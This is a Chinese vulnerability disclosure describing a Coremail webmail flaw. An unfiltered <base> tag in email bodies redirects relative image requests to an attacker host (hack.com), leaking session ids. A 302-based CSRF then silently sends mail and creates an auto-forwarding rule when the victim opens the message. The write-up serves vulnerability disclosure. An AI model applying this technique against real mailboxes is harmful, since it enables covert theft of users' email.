### 简要描述:
利用 Coremail 邮件正文 filter 的一个漏洞,当用户打开 bad mail 时会触发 CSRF,进而设置邮件转发规则。
### 详细说明:
Coremail 把邮件正文的
```
<img src='csrf.jpg'/>
```
替换成
[<img src="https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png)
嗯,这里是相对地址,正巧 Coremail 没有过滤
```
<base>
```
tag。
[<img src="https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg" alt="150444205b8cb7cb036f55091ba028a5f83fa443.png.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg)
以 http://mail.***.edu.cn 为例,用户浏览器会解析此地址为
http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpg
hack.com 后端即可获取 sid(仍然无法获得 cookie)。
Coremail 后端 jsp 获取表单请求没有判断 POST/GET,通过 302 redirect 即可构造 CSRF。
下图是 http://hack.com/coremail/s/index.php
[<img src="https://images.seebug.org/upload/201407/231558585ea4c3e520de8f3de0749c46c540687c.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231558585ea4c3e520de8f3de0749c46c540687c.jpg)
这个 CSRF 会在用户打开邮件的同时,偷偷发出一封邮件。把 img 隐藏掉即可达到隐蔽性。
同样用此漏洞来建立一条邮箱规则:
[<img src="https://images.seebug.org/upload/201406/1504585932349285f075a3f1c690d844dd16b1c3.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1504585932349285f075a3f1c690d844dd16b1c3.png)
可以达到 **在用户不知情打开一封邮件时,其邮箱自动建立一条自动转发规则** 的效果,进而窃取用户之后收到的邮件。
暂时没有找到做出蠕虫的效果。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/23155932f938bc8ee718d3144232e20fa9d60745.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/23155932f938bc8ee718d3144232e20fa9d60745.jpg)
这些邮件才不是我发的呢 = =。
京公网安备 11010502034610号
暂无评论